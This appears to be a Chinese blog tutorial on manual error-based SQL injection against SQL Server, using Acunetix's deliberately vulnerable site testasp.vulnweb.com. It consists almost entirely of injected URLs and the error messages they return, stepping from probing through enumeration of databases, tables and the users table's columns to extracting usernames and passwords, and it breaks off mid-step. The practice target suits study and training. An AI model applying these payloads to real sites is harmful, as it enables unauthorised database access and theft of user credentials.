zoukankan      html  css  js  c++  java
  • sql server手工注入

    sql server手工注入

    测试网站testasp.vulnweb.com

    1.

    http://testasp.vulnweb.com/showforum.asp?id=0

    http://testasp.vulnweb.com/showforum.asp?id=0'

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=1

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2

    2.数据库版本

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select @@version)

    3.数据库名

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select db_name())

    4.第一个数据库

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from master..sysdatabases where dbid>4)

    返回Conversion failed when converting the nvarchar value 'acublog' to data type int

    5.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from master..sysdatabases where dbid>4 and name<> 'acublog')

    返回Conversion failed when converting the nvarchar value 'acuforum' to data type int

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from master..sysdatabases where dbid>4 and name<> 'acublog' and name<> 'acuforum')

    返回Conversion failed when converting the nvarchar value 'acuservice' to data type int.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from master..sysdatabases where dbid>4 and name<> 'acublog' and name<> 'acuforum' and name<> 'acuservice')

    返回Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.

    那就这几个数据库了

    6.获取表名

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from sysobjects where xtype='u')

    返回Conversion failed when converting the nvarchar value 'threads' to data type int.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from sysobjects where xtype='u' and name<> 'threads')

    返回Conversion failed when converting the nvarchar value 'users' to data type int

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from sysobjects where xtype='u' and name<> 'threads' and name<> 'users')

    返回Conversion failed when converting the nvarchar value 'forums' to data type int.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from sysobjects where xtype='u' and name<> 'threads' and name<> 'users' and name<> 'forums')

    返回Conversion failed when converting the nvarchar value 'posts' to data type int.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from sysobjects where xtype='u' and name<> 'threads' and name<> 'users' and name<> 'forums' and name<> 'posts')

    返回Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.

    7.users的列名

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'users'))

    返回Conversion failed when converting the nvarchar value 'uname' to data type int.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'users') and name<> 'uname')

    返回Conversion failed when converting the nvarchar value 'upass' to data type int.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'users') and name<> 'uname' and name<> 'upass')

    返回Conversion failed when converting the nvarchar value 'email' to data type int.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'users') and name<> 'uname' and name<> 'upass' and name<> 'email')

    返回Conversion failed when converting the nvarchar value 'realname' to data type int.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'users') and name<> 'uname' and name<> 'upass' and name<> 'email' and name<> 'realname')

    返回Conversion failed when converting the nvarchar value 'avatar' to data type int.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'users') and name<> 'uname' and name<> 'upass' and name<> 'email' and name<> 'realname' and name<> 'avatar')

    返回Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.

    forums的列名

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'forums'))

    8.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 uname from users)

    返回Conversion failed when converting the nvarchar value '--' to data type int.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 upass from users)

    返回Conversion failed when converting the nvarchar value 'none' to data type int.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 uname  from users where id =2)

    返回

  • 相关阅读:
    Open vSwitch使用案例扩展实验
    hdoj-1233-还是畅通工程
    DS实验题 Floyd最短路径 & Prim最小生成树
    DS实验题 Missile
    Mininet实验 基于Mininet实现BGP路径挟持攻击实验
    Gift for GS5
    Bellman-Ford算法
    pox目录中的交换机mac地址学习模块 l2_multi源码
    Mininet实验 使用l2_multi模块寻找最短路径实验
    Ubuntu安装Flash
  • 原文地址:https://www.cnblogs.com/nightnine/p/5479900.html
Copyright © 2011-2022 走看看